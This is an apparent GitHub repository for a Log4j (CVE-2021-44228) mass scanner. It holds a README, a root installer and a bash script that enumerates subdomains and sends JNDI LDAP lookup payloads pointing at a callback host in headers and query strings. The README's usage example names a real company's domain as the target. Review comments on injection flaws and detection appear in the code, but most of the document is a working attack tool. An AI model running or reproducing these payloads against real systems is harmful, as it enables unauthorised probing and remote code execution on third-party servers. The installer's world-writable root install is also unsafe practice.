├── log4j.png ├── installer.sh ├── test.json ├── README.md └── .log4jExploiter.sh /log4j.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thecyberneh/Log4j-RCE-Exploiter/HEAD/log4j.png -------------------------------------------------------------------------------- /installer.sh: -------------------------------------------------------------------------------- 1 | shc -f .log4jExploiter.sh 2 | mv .log4jExploiter.sh.x log4jExploiter 3 | chmod 777 log4jExploiter 4 | cp log4jExploiter /usr/bin 5 | -------------------------------------------------------------------------------- /test.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://jumpy-floor.surge.sh/test.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://jumpy-floor.surge.sh/test.yaml", 6 | "name": "Foo" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Log4j-RCE-Exploiter 2 | Scanner for Log4j RCE CVE-2021-44228 3 | 4 | 5 | ![Log4j RCE Scanner Image](https://github.com/thecyberneh/Log4j-RCE-Exploiter/blob/main/log4j.png "Log4j Exploiter") 6 | 7 | # Installation 8 | To install, run the following commands as the superuser (root): 9 | ``` 10 | ▶ cd Log4j-RCE-Exploiter 11 | 12 | ▶ chmod 777 installer.sh 13 | 14 | ▶ ./installer.sh 15 | ``` 16 | 17 | # Usage 18 | 19 | ``` 20 | 21 | ▶ log4jExploiter -d tesla.com -b 6nuulng8dd2sivtd3kht31s9e0kq8f.burpcollaborator.net 22 | 23 | -h, --help Display help 24 | -l, --url-list List of domain/subdomain/ip to be used for scanning. 25 | -d, --domain The domain name to which all subdomains and itself will be checked. 26 | -b, --burpcollabid Burp Collaborator client id address or interactsh domain address. 
27 |
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/.log4jExploiter.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Sends HTTP requests that carry a JNDI LDAP lookup string (the Log4j
# CVE-2021-44228 pattern named in the README) to every URL derived from a
# domain (-d) or from a host list (-l). The lookup string points at the
# callback domain given with -b.
# External tools invoked: subfinder, assetfinder, amass, httpx, gau, curl, tput.
# No strict mode (set -e / -u / pipefail) is enabled, so a failing tool in a
# pipeline does not stop the run.

# ANSI escape sequences used by the two banners: by = bold yellow,
# br = bold red; bye / bre close the coloured block.
# blink is assigned but not referenced anywhere in this script.
by="\033[1;33m"
bye="\033[1;00m"
br="\033[1;31m"
bre="\033[1;00m"
blink="\e[5m"

# The banner is passed as the printf FORMAT string, assembled from an unquoted
# $by, a quoted multi-line literal and an unquoted $bye. This works only
# because the text contains no % sequences.
printf ""$by"

██╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗███████╗██████╗
██║ ██╔═══██╗██╔════╝ ██║ ██║ ██║ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██║ ███╗███████║ ██║ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║ ██║╚════██║██ ██║ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══╝ ██╔══██╗
███████╗╚██████╔╝╚██████╔╝ ██║╚█████╔╝ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ███████╗██║ ██║
╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝



"$bye""


# Author-credit banner, printed the same way (text used as the format string).
printf ""$br"

--------------------------- Written By ----------------------------
| Twitter :- https://twitter.com/thecyberneh |
| Instagram :- https://www.instagram.com/thecyberneh/ |
| Linkedin :- https://www.linkedin.com/in/thenehpatel/ |
| |
| Twitter :- https://twitter.com/imhardikrathod |
| Instagram :- https://www.instagram.com/cyberknight60/ |
| Linkedin :- https://www.linkedin.com/in/hardik-rathod1491/ |
-------------------------------------------------------------------


"$bre""

#######################################
# showHelp: print the usage text to stdout in terminal colour 2 (green on
# ANSI terminals), then reset attributes with tput sgr0.
# $0 in the here-document expands to the path the script was invoked as.
# Arguments: none
# Returns:   exit status of cat
#######################################
showHelp() {
  cat << EOF
$(tput setaf 2)
Usage:
$0 -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
$0 -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
-h, --help Display help
-l, --url-list List of domain/subdomain/ip to be used for scanning.
-d, --domain The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid Burp collabrator client id address or interactsh domain address.
$(tput sgr0)
EOF
}

#######################################
# domainScan: collect subdomains for $domain with subfinder, assetfinder and
# amass, de-duplicate them, probe them with httpx, and send three curl
# requests per URL that httpx prints.
# Globals: domain (read), burpcollabid (read)
# Files:   appends (>>) to ./sub.$domain; the file is never truncated, so
#          entries from earlier runs against the same domain are reused.
# Outputs: progress banners and one status block per URL on stdout.
#
# NOTE(review) - risk to the machine running this script: each curl command
# is built as TEXT with echo | sed and then piped into a new bash. $url comes
# from httpx output (network-derived data) and $burpcollabid from argv; both
# are pasted into that text unquoted, so shell metacharacters in either value
# are interpreted and executed locally. Calling curl directly with quoted
# arguments would remove that second parsing step.
# NOTE(review): $domain is expanded unquoted in command arguments and in the
# redirection target, so it is subject to word splitting and globbing.
# NOTE(review): `read url` has no -r and no IFS=, so backslashes and
# leading/trailing whitespace in a line are altered before use.
# NOTE(review): curl output is discarded (> /dev/null) and its exit status is
# not checked. The "Method N" block is printed unconditionally; it means the
# requests were attempted, not that a host is vulnerable. The script itself
# never inspects a response. The labels also do not follow the send order:
# the ?test= request is sent second but labelled "Method 3".
# Detection: the three requests place a jndi:ldap:// reference to the
# callback domain in the X-Api-Version header, in a `test` query parameter,
# and in the User-Agent header; each is matchable in proxy, WAF and
# web-server logs.
#######################################
domainScan() {
  echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Subfinder is working $(tput sgr0)\n" ; subfinder -silent -d sub.$domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Assetfinder is working $(tput sgr0)\n" ; assetfinder -subs-only $domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Amass is working $(tput sgr0)\n" ; amass enum -norecursive --silent -noalts -d $domain >> sub.$domain ; cat sub.$domain | sort -u | httpx -silent | while read url; do
  # Request 1: lookup string in the X-Api-Version header (command text -> bash).
  echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
  # Request 2: lookup string in the `test` query parameter; here $url is
  # expanded unquoted by this shell before the text reaches bash.
  echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
  # Request 3: lookup string in the User-Agent header.
  echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
  # Unconditional status output; not derived from any curl result.
  echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}

#######################################
# listScan: read hosts from the file named by $list, de-duplicate them, pass
# them through httpx and then gau, and send the same three curl requests to
# every URL gau prints.
# Globals: list (read), burpcollabid (read)
# Outputs: one status block per URL on stdout.
#
# NOTE(review): the same local command-injection risk as in domainScan
# applies, and the exposure is wider here because every URL emitted by gau is
# substituted unquoted into text that is piped to bash. $list is also
# expanded unquoted. The status block is again printed unconditionally.
#######################################
listScan() {
  cat $list | sort -u | httpx -silent | gau | while read url; do
  echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
  echo 'curl -s --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$burpcollabid/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
  echo 'curl -s --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: \${jndi:ldap://$burpcollabid/a}'|g" | sed "s|\$url|$url|g" | bash
  echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}

# Argument handling. Only two exact shapes are accepted:
#   -l|--url-list FILE   -b|--burpcollabid CALLBACK
#   -d|--domain   DOMAIN -b|--burpcollabid CALLBACK
# $3 must be the -b flag, and $4 is taken as its value with no check that it
# (or $2) is non-empty. Every case arm ends in exit, so the loop body runs at
# most once and the trailing `shift` is never reached.
# `exit` is called without a status, so a usage error exits with showHelp's
# status (normally 0) and callers cannot tell it from success.
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in
  -l | --url-list )
    list="$2"
    if [[ "$3" == "-b" || "$3" == "--burpcollabid" ]]; then
      burpcollabid="$4"
    else
      showHelp
      exit
    fi
    listScan
    exit
    ;;
  -d | --domain )
    domain="$2"
    if [[ "$3" == "-b" || "$3" == "--burpcollabid" ]]; then
      burpcollabid="$4"
    else
      showHelp
      exit
    fi
    domainScan
    exit
    ;;
  *)
    showHelp
    exit
    ;;
esac; shift; done
# Reached only when $1 does not start with "-" (including no arguments) or is
# exactly "--": "--" is shifted and the script ends without scanning; any
# other value prints the help text.
if [[ "$1" == '--' ]]; then
  shift
else
  showHelp
  exit
fi

--------------------------------------------------------------------------------